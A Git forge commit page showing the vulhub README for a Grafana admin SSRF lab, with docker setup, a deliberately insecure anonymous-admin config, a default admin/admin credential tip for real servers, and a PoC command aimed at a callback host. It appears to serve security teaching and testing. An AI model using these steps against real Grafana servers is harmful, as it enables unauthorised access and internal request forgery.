aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
grafana/admin-ssrf/README.md Normal file
View File

@@ -0,0 +1,43 @@
# Grafana Admin Portal SSRF
[中文版本(Chinese version)](README.zh-cn.md)
Grafana is a multi-platform open source analytics and interactive visualization web application.
The admin user is able to make requests to an unintended location in all versions of Grafana.
References:
- <https://github.com/RandomRobbieBF/grafana-ssrf>
## Vulnerable environment
Execute following command to start a Grafana 8.5.4:
```
docker compose up -d
```
Then you can see the portal page for Grafana without the authentication in `http://your-ip:3000`, because this server enabled the anonymous as admins by:
```ini
[auth.anonymous]
enabled = true
org_role = Admin
```
If Grafana ask you for user credentials in real world, can try default `admin` and `admin`.
## Vulnerability Reproduce
Use [this POC](https://github.com/RandomRobbieBF/grafana-ssrf) to reproduce the SSRF:
```
python grafana-ssrf.py -H http://your-ip:3000 -u http://example.interact.sh/attack
```
![](1.png)
As you can see, I got the request from Grafana:
![](2.png)